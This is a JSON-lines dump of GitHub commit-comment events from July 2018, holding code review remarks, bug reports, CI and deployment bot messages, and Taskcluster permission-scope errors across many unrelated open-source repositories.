{"id":"7956765304","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29686515,"position":206,"line":410,"path":"modules/redisq/logqueue-redis.c","commit_id":"f62e3a6426a7eea271e10dee3b481037ba79155f","created_at":"2018-07-12T14:51:54Z","updated_at":"2018-07-12T14:51:54Z","author_association":"MEMBER","body":"Notes:\r\n1. This function returns with a boolean value, while that return value is never used. In such case it would be nice to question if the return value is needed at all ?\r\n2. In this code you created a thread, and waited it to terminate, normally we want to wait for thread to finish in other part of the code. The join is going to block this thread until it finished.\r\n3. As I already explained, the \"worker\" thread could have helped with the thread safety. For this time it was solved with Mutex, this part is not needed. (Also it does not really do what it should.)"}},"created_at":"2018-07-12T14:51:54Z"}
{"id":"7956768847","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29686520,"position":1,"line":1,"path":"python note","commit_id":"39fbb60af60e210373c6782cedcbdae730f105f0","created_at":"2018-07-12T14:52:27Z","updated_at":"2018-07-12T14:52:27Z","author_association":"OWNER","body":"```\r\nimport sys\r\nsys.path\r\nsys.argv  #input some arguments to made a list, if no input, there is still a path in the list\r\nprint(sys.argv[2])\r\n\r\nimport os\r\nos.system('shell order')  #execute the shell order\r\nres=os.popen('shell order').read()  #assign the shell order result to the variable 'res'\r\nprint(res)\r\n```"}},"created_at":"2018-07-12T14:52:27Z"}
{"id":"7956769903","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29686523,"position":3,"line":3,"path":"server/services/emergency.js","commit_id":"c5b93d1c13973231d7cf5b5ca29110a533212893","created_at":"2018-07-12T14:52:36Z","updated_at":"2018-07-12T14:52:36Z","author_association":"COLLABORATOR","body":"change this name, it should be getEmergencies, for the dal you could do dal.getEmergencies"}},"created_at":"2018-07-12T14:52:36Z"}
{"id":"7956785636","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla-releng/shipit-v2"},"payload":{"comment":{"id":29686547,"position":null,"line":null,"path":null,"commit_id":"dcce390de3ed9a2398d9a8124e1836b4f7dc34c8","created_at":"2018-07-12T14:54:59Z","updated_at":"2018-07-12T14:54:59Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nsecrets:get:repo:github.com/mozilla-releng/shipit-v2:dockerhub\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/mozilla-releng/shipit-v2:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"secrets:get:repo:github.com/mozilla-releng/shipit-v2:dockerhub\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/M5Mv7osgRWyRji0u_mNUhA\",\n                \"queue:schedule-task:taskcluster-github/M5Mv7osgRWyRji0u_mNUhA/XU0uczOSQB20FPOUwCcJnw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-12T14:54:59.395Z\n\n</details>"}},"created_at":"2018-07-12T14:54:59Z"}
{"id":"7956788335","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29686555,"position":10,"line":13,"path":"src/app/components/growl/growl.component.ts","commit_id":"158b5f586b724bc531241f0f5dc57ea2592a7582","created_at":"2018-07-12T14:55:25Z","updated_at":"2018-07-12T14:55:25Z","author_association":"NONE","body":"`onExitEvent` - можно просто `onExit` или `onClose`"}},"created_at":"2018-07-12T14:55:25Z"}
{"id":"7956789383","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29686556,"position":1,"line":1,"path":"client/stores/index.js","commit_id":"a7360825e75faa04008003cdd4a74507a0a4bb9f","created_at":"2018-07-12T14:55:34Z","updated_at":"2018-07-12T14:55:34Z","author_association":"COLLABORATOR","body":"remember to do the export directly"}},"created_at":"2018-07-12T14:55:34Z"}
{"id":"7956795448","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"ethereum/research"},"payload":{"comment":{"id":29686565,"position":6,"line":25,"path":"mimc_stark/utils.py","commit_id":"e4d2fc055a14513536c89a5bf1c4763f6107643a","created_at":"2018-07-12T14:56:29Z","updated_at":"2018-07-12T14:56:29Z","author_association":"NONE","body":"why not the classic:\r\n`return x != 0 and ((x & (x - 1)) == 0)`\r\n\r\nrecursion seems like overkill to check if it's a power of 2, no?"}},"created_at":"2018-07-12T14:56:29Z"}
{"id":"7956802804","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29686575,"position":18,"line":28,"path":"client/client.js","commit_id":"a7360825e75faa04008003cdd4a74507a0a4bb9f","created_at":"2018-07-12T14:57:37Z","updated_at":"2018-07-12T14:57:37Z","author_association":"COLLABORATOR","body":"put stores here, like store={{...store, ...stores]}\r\nPlus use a more meaningful name, like reduxStore and mobxStore"}},"created_at":"2018-07-12T14:57:37Z"}
{"id":"7956803184","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla-releng/shipit-v2"},"payload":{"comment":{"id":29686576,"position":null,"line":null,"path":null,"commit_id":"dcce390de3ed9a2398d9a8124e1836b4f7dc34c8","created_at":"2018-07-12T14:57:41Z","updated_at":"2018-07-12T14:57:41Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nsecrets:get:repo:github.com/mozilla-releng/shipit-v2:dockerhub\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/mozilla-releng/shipit-v2:branch:dockerflow\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"secrets:get:repo:github.com/mozilla-releng/shipit-v2:dockerhub\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/WENh5AFhTz2L6wQLKe3LBw\",\n                \"queue:schedule-task:taskcluster-github/WENh5AFhTz2L6wQLKe3LBw/Y2oFLN1mRwCDBqjjY6FjYg\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-12T14:57:40.969Z\n\n</details>"}},"created_at":"2018-07-12T14:57:41Z"}
{"id":"7956803483","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29686577,"position":null,"line":null,"path":null,"commit_id":"6df08a927f97dfaac0c1272af9dafb14fc0b79af","created_at":"2018-07-12T14:57:43Z","updated_at":"2018-07-12T14:57:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-145742 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-145742\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T14:57:43Z"}
{"id":"7956808040","type":"CommitCommentEvent","actor":{"login":"demogithubnlu"},"repo":{"name":"demogithubnlu/YY2018OSS"},"payload":{"comment":{"id":29686584,"position":null,"line":null,"path":null,"commit_id":"9e23bf83be3192c15430e324490d019e6cf3986a","created_at":"2018-07-12T14:58:25Z","updated_at":"2018-07-12T14:58:25Z","author_association":"OWNER","body":"fff"}},"created_at":"2018-07-12T14:58:25Z"}
{"id":"7956810578","type":"CommitCommentEvent","actor":{"login":"PravinaBhatt"},"repo":{"name":"PravinaBhatt/hhaccessibility.github.io"},"payload":{"comment":{"id":29686587,"position":null,"line":null,"path":null,"commit_id":"dfe6c2c48674f03479384c1b21f5f217b9d51bb7","created_at":"2018-07-12T14:58:46Z","updated_at":"2018-07-12T14:58:46Z","author_association":"OWNER","body":"Hello Josh,\r\n    Does it fits proper? Let me know for other changes.\r\nThank you"}},"created_at":"2018-07-12T14:58:46Z"}
{"id":"7956810641","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Liador/game-api"},"payload":{"comment":{"id":29686588,"position":16,"line":75,"path":"manager/playerManager.go","commit_id":"79dbb81a0bbbef7c605ea05f64c2c7ab67c7a076","created_at":"2018-07-12T14:58:47Z","updated_at":"2018-07-12T14:58:47Z","author_association":"NONE","body":"attention, le codestyle en Go n'est pas du tout le même que dans les autres langages. Inspire-toi du travail déjà fait :)"}},"created_at":"2018-07-12T14:58:47Z"}
{"id":"7956811057","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29686589,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-12T14:58:50Z","updated_at":"2018-07-12T14:58:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-780](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-780).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-780-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-12T14:58:50Z"}
{"id":"7956811696","type":"CommitCommentEvent","actor":{"login":"JayPanoz"},"repo":{"name":"readium/r2-shared-swift"},"payload":{"comment":{"id":29686590,"position":null,"line":null,"path":null,"commit_id":"f7a95423667f6cb32e71fc3a0d1c8cb8cb1f6267","created_at":"2018-07-12T14:58:56Z","updated_at":"2018-07-12T14:58:56Z","author_association":"NONE","body":"Yeah that’s indeed an outlier. \r\n\r\nTo put it simply, there are 2 scenarios there: \r\n\r\n1. The author didn’t declare a `line-height`, in which case we apply one depending on the current font in use;\r\n2. The author declared one, in which case her/his value overrides ours. \r\n\r\nOur “fallback” value is a pseudo algorithm, see https://github.com/readium/readium-css/blob/master/css/src/modules/ReadiumCSS-base.css#L37, which means it is based on the font-family (more accurately the width of its `0` character and its [x-height](https://typedecon.com/blogs/type-glossary/x-height/)), the language/script (e.g. in Japanese, `line-height` is 15–20% more than in Latin), and the user `font-size`. So it’s not a set value like `1.5` *per se*, it’s a result the browser gets at runtime depending on font metrics and other settings.\r\n\r\nThe pseudo algorithm is explained in docs: https://github.com/readium/readium-css/blob/master/docs/CSS18-further_details.md#dynamic-leading \r\n\r\nNot that I’ve been comfortable with this implementation but that was that or setting arbitrary values for every font-family, depending on the language of the document and the font-size setting, etc. [Something similar to what iBooks does, actually](https://github.com/FriendsOfEpub/WillThatBeOverriden/blob/master/ReadingSystems/iBooks/OS%20X/FontPresets.plist). The downside is that the browser is in charge and the default value is therefore totally opaque unless you’re checking what it is at runtime and adjust the setting accordingly.\r\n\r\nThat being said, the setting is not tightly coupled to this pseudo-algorithm and/or the authors’ value, cf. https://github.com/readium/readium-css/blob/master/css/src/modules/user-settings-submodules/ReadiumCSS-lineHeight_pref.css\r\n\r\nBut yeah, to sum things up, the default value has to be retrieved in some way, in order to increment and decrease `line-height`. "}},"created_at":"2018-07-12T14:58:56Z"}
{"id":"7956812689","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29686592,"position":null,"line":null,"path":null,"commit_id":"d9ac5f768cf09b1b1cfbc544374b95ea6ac4d9fc","created_at":"2018-07-12T14:59:05Z","updated_at":"2018-07-12T14:59:05Z","author_association":"MEMBER","body":"Yes! Metadata on the API sounds great.\r\nPlease open a separate issue\r\n\r\nGenerated overloads could even be:\r\n```kotlin\r\nfun SomeInterface.function(name: String, vararg options: Pair<String, Any?>) =\r\n  function(mapOf(\"name\" to name) + options.toMap())\r\n\r\nfun SomeInterface.function(name: Class<*>, vararg options: Pair<String, Any?>) =\r\n  function(mapOf(\"name\" to name) + options.toMap())\r\n```"}},"created_at":"2018-07-12T14:59:05Z"}
{"id":"7956814358","type":"CommitCommentEvent","actor":{"login":"draghoul"},"repo":{"name":"draghoul/hello"},"payload":{"comment":{"id":29686594,"position":null,"line":null,"path":null,"commit_id":"e425e884c5765e163cc46592a804b4df615ce5c5","created_at":"2018-07-12T14:59:20Z","updated_at":"2018-07-12T14:59:20Z","author_association":"OWNER","body":"First Comment"}},"created_at":"2018-07-12T14:59:20Z"}
{"id":"7956821342","type":"CommitCommentEvent","actor":{"login":"IvanCherepica"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29686609,"position":35,"line":86,"path":"webapp/src/main/java/education/web/platform/controllers/AdminPageController.java","commit_id":"7709605f228cbf9750a7270c41320e57ec617745","created_at":"2018-07-12T15:00:19Z","updated_at":"2018-07-12T15:00:19Z","author_association":"NONE","body":"На 88 строке chiefMentor сетятся новые пользователи. Они не просто для логов достаются"}},"created_at":"2018-07-12T15:00:19Z"}
{"id":"7956821513","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29686610,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T15:00:21Z","updated_at":"2018-07-12T15:00:21Z","author_association":"CONTRIBUTOR","body":"In this series of commits you have changed lots of colors in the theme. Some of which are merely cosmetic, but for some of them I don't really understand the reasoning. For example:\r\n\r\n* `:literal_date` now renders in black (as a variable name). Maybe you don't want to highlight date in a different color, but should't it at least be highlighted as a sigil?\r\n\r\n* `:string_sigil`, `:string_symbol`, `:string_escape`, ...: highlighting all of these in the same color makes it harder to distinguish atoms, sigils and strings at a glance, and rendering the escape characters in a string as if they were normal characters completely defeats the point of having syntax highlighting in the first place...\r\n\r\n* `:name_function`: is now treated like a normal function call or a variable. That's **not** the goal of `:name_function`. This token type is meant to be used in front for something like `def` or `defmacro`, like this:\r\n\r\n```elixir\r\ndef my_fun(...)\r\n```"}},"created_at":"2018-07-12T15:00:21Z"}
{"id":"7956826804","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Liador/game-api"},"payload":{"comment":{"id":29686624,"position":16,"line":75,"path":"manager/playerManager.go","commit_id":"79dbb81a0bbbef7c605ea05f64c2c7ab67c7a076","created_at":"2018-07-12T15:01:05Z","updated_at":"2018-07-12T15:01:05Z","author_association":"NONE","body":"Typiquement là tu peux tout simplement faire:\r\n```\r\nif newAmount := player.Money + amount; newAmount >= 0 {\r\n    player.Money = newAmount\r\n} else {\r\n    player.Money = 0\r\n}\r\n```"}},"created_at":"2018-07-12T15:01:05Z"}
{"id":"7956834224","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Liador/game-api"},"payload":{"comment":{"id":29686641,"position":4,"line":8,"path":"model/price.go","commit_id":"79dbb81a0bbbef7c605ea05f64c2c7ab67c7a076","created_at":"2018-07-12T15:02:15Z","updated_at":"2018-07-12T15:02:15Z","author_association":"NONE","body":"Amount est déjà présent, quel est l'intérêt de Cost ?"}},"created_at":"2018-07-12T15:02:15Z"}
{"id":"7956836689","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Liador/game-api"},"payload":{"comment":{"id":29686647,"position":4,"line":62,"path":"manager/playerManager.go","commit_id":"79dbb81a0bbbef7c605ea05f64c2c7ab67c7a076","created_at":"2018-07-12T15:02:38Z","updated_at":"2018-07-12T15:02:38Z","author_association":"NONE","body":"un espace avant le = :)"}},"created_at":"2018-07-12T15:02:38Z"}
{"id":"7956842265","type":"CommitCommentEvent","actor":{"login":"jaycaoyang"},"repo":{"name":"cookies-run/easyPay"},"payload":{"comment":{"id":29686664,"position":null,"line":null,"path":null,"commit_id":"130c7967442eab5f42b27c8e2f2061d7bc3cc636","created_at":"2018-07-12T15:03:30Z","updated_at":"2018-07-12T15:03:30Z","author_association":"CONTRIBUTOR","body":"将学校信息的这几个字段写死"}},"created_at":"2018-07-12T15:03:30Z"}
{"id":"7956846017","type":"CommitCommentEvent","actor":{"login":"MADHUKESHA"},"repo":{"name":"akki777/Url-Shortener"},"payload":{"comment":{"id":29686675,"position":11,"line":11,"path":"app.js","commit_id":"990a72c4450f068deff82f18285be67cacfa6028","created_at":"2018-07-12T15:04:06Z","updated_at":"2018-07-12T15:04:06Z","author_association":"NONE","body":"create a db helper module"}},"created_at":"2018-07-12T15:04:06Z"}
{"id":"7956846638","type":"CommitCommentEvent","actor":{"login":"yxz111222"},"repo":{"name":"LiXiang980303/proposal_system"},"payload":{"comment":{"id":29686677,"position":null,"line":null,"path":null,"commit_id":"8f14a978a400ae0f78b5cda4ab8a4e661dfe073a","created_at":"2018-07-12T15:04:12Z","updated_at":"2018-07-12T15:04:12Z","author_association":"COLLABORATOR","body":"Comme"}},"created_at":"2018-07-12T15:04:12Z"}
{"id":"7956858447","type":"CommitCommentEvent","actor":{"login":"zordak7"},"repo":{"name":"bizlift/bittube-miner-hive"},"payload":{"comment":{"id":29686707,"position":null,"line":null,"path":null,"commit_id":"f6f15a713df2e2bed129b4bb99e432372a0b8aed","created_at":"2018-07-12T15:06:04Z","updated_at":"2018-07-12T15:06:04Z","author_association":"NONE","body":"+-cmake .. -DCUDA_ENABLE=OFF -DOpenCL_INCLUDE_DIR=/opt/amdgpu-pro/lib/x86_64-linux-gnu -DOpenCL_LIBRARY=/opt/amdgpu-pro/lib/x86_64-linux-gnu/libOpenCL.so\r\nNot work, and\r\ncmake .. -DCUDA_ENABLE=OFF -DOpenCL_INCLUDE_DIR=/opt/amdgpu-pro/lib/x86_64-linux-gnu -DOpenCL_LIBRARY=/opt/amdgpu-pro/lib/x86_64-linux-gnu/libOpenCL.so\r\nNot work\r\nCMake Error at CMakeLists.txt:309 (message):                                                                                                                                                                   \r\n  microhttpd NOT found: use `-DMICROHTTPD_ENABLE=OFF` to build without http                                                                                                                                    \r\n  daemon support                                                                                                                                                                                               \r\n                                                                                                                                                                                                               \r\n                                                                                                                                                                                                               \r\n-- Configuring incomplete, errors occurred!                                                                                                                                                                    \r\nSee also \"/hive/custom/bittube-git/bittube-miner/build/CMakeFiles/CMakeOutput.log\".                                                                                                                            \r\nSee also \"/hive/custom/bittube-git/bittube-miner/build/CMakeFiles/CMakeError.log\". \r\nI install cmake, but he dont work\r\nSorry for my english"}},"created_at":"2018-07-12T15:06:04Z"}
{"id":"7956865921","type":"CommitCommentEvent","actor":{"login":"Djeymisson"},"repo":{"name":"AlanaTenorio/Agrotur"},"payload":{"comment":{"id":29686718,"position":null,"line":null,"path":null,"commit_id":"dac287e8deeb3f4bf4ea6c9959e55738727543d4","created_at":"2018-07-12T15:07:14Z","updated_at":"2018-07-12T15:07:14Z","author_association":"COLLABORATOR","body":"O composer não estava instalando o Behat somente com o _composer install_, por isso foi necessário adicionar a linha _composer update_. No script, o comando para rodar o Behat ficou o caminho do _.php_ no diretório do projeto. Agora o Travis chama a ferramenta corretamente mas ainda não roda os testes por faltar configuração."}},"created_at":"2018-07-12T15:07:14Z"}
{"id":"7956866926","type":"CommitCommentEvent","actor":{"login":"StefanScherer"},"repo":{"name":"istopwg/ippsample"},"payload":{"comment":{"id":29686719,"position":null,"line":null,"path":null,"commit_id":"6d2df36ba8676e19d9e0bbe9aca9925c6d66fcf0","created_at":"2018-07-12T15:07:23Z","updated_at":"2018-07-12T15:07:23Z","author_association":"CONTRIBUTOR","body":"I'll have a look at the Travis build and send you a PR. Thanks for merging the Docker PR, this may be helpful here as well.\r\n"}},"created_at":"2018-07-12T15:07:23Z"}
{"id":"7956877569","type":"CommitCommentEvent","actor":{"login":"cheatfate"},"repo":{"name":"status-im/nim-http-utils"},"payload":{"comment":{"id":29686737,"position":null,"line":null,"path":null,"commit_id":"b4b8542f6e92a22e5f6b97c94922f02709dbda2e","created_at":"2018-07-12T15:09:06Z","updated_at":"2018-07-12T15:09:06Z","author_association":"COLLABORATOR","body":"Inspired project was https://github.com/mendsley/tinyhttp. But its SM was too simple and do not process HTTP headers strictly to RFCs. No automatic tools was used to generate SM."}},"created_at":"2018-07-12T15:09:06Z"}
{"id":"7956880293","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29686744,"position":null,"line":null,"path":null,"commit_id":"9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff","created_at":"2018-07-12T15:09:30Z","updated_at":"2018-07-12T15:09:30Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T15:09:30Z"}
{"id":"7956885025","type":"CommitCommentEvent","actor":{"login":"huqiwen0313"},"repo":{"name":"ajlee21/Pseudomonas_latent_spaces"},"payload":{"comment":{"id":29686754,"position":68,"line":298,"path":"scripts/nbconverted/tybalt_1layer_model.py","commit_id":"be53184c48d85391e5040363b7206e88ad2ed6b2","created_at":"2018-07-12T15:10:15Z","updated_at":"2018-07-12T15:10:15Z","author_association":"NONE","body":"Up to you, I think maybe can also save to .hdf5 file\r\nencoder_model_file = path_and_filename\r\nencoder.save(encoder_model_file)"}},"created_at":"2018-07-12T15:10:15Z"}
{"id":"7956887471","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-icarus"},"payload":{"comment":{"id":29686761,"position":4,"line":81,"path":"source/css/style.styl","commit_id":"2a9bee47f6168bc6156a38836ccf13b3daeae429","created_at":"2018-07-12T15:10:36Z","updated_at":"2018-07-12T15:10:36Z","author_association":"OWNER","body":"Shouldn't import in the main stylesheet file."}},"created_at":"2018-07-12T15:10:36Z"}
{"id":"7956889535","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29686764,"position":null,"line":null,"path":null,"commit_id":"3d3a320f0903c3c906abcd4e5510eea8c5fda23b","created_at":"2018-07-12T15:10:56Z","updated_at":"2018-07-12T15:10:56Z","author_association":"CONTRIBUTOR","body":"My apologies. This was a bad merge commit. Not sure how the sparx stuff was added, but I'm undoing this commit."}},"created_at":"2018-07-12T15:10:56Z"}
{"id":"7956889816","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29686765,"position":null,"line":null,"path":null,"commit_id":"4d24ede752c17a2c6ecaada81ed007e5cb930e72","created_at":"2018-07-12T15:10:58Z","updated_at":"2018-07-12T15:10:58Z","author_association":"COLLABORATOR","body":"Bug report. \r\n\r\nWhen \"none\" is active double click on clip returns to bilinear but in the menu none is still active.\r\n\r\nWhen no clip is imported and \"none\" selected in the menu after importing the clip default bilinear kiks in but in the menu still none is active.\r\n"}},"created_at":"2018-07-12T15:10:58Z"}
{"id":"7956896251","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"nielsfalk/ktor-swagger"},"payload":{"comment":{"id":29686776,"position":17,"line":35,"path":"ktor-swagger-root.gradle.kts","commit_id":"7949562bc5f027913008d4e2ea68751e0e73665b","created_at":"2018-07-12T15:12:00Z","updated_at":"2018-07-12T15:12:00Z","author_association":"COLLABORATOR","body":"You should tag this `0.1.0`."}},"created_at":"2018-07-12T15:12:00Z"}
{"id":"7956909623","type":"CommitCommentEvent","actor":{"login":"andrewklimek"},"repo":{"name":"andrewklimek/frenchpress"},"payload":{"comment":{"id":29686795,"position":null,"line":null,"path":null,"commit_id":"098f988077718d7fbc1e01ca5e1dbe1f4e4a80a6","created_at":"2018-07-12T15:14:06Z","updated_at":"2018-07-12T15:14:06Z","author_association":"OWNER","body":"* “now” should have said “not”"}},"created_at":"2018-07-12T15:14:06Z"}
{"id":"7956910632","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29686796,"position":null,"line":null,"path":null,"commit_id":"c420eb1bb06e3fe01526496bcaf2fecc702f2fa4","created_at":"2018-07-12T15:14:16Z","updated_at":"2018-07-12T15:14:16Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T15:14:16Z"}
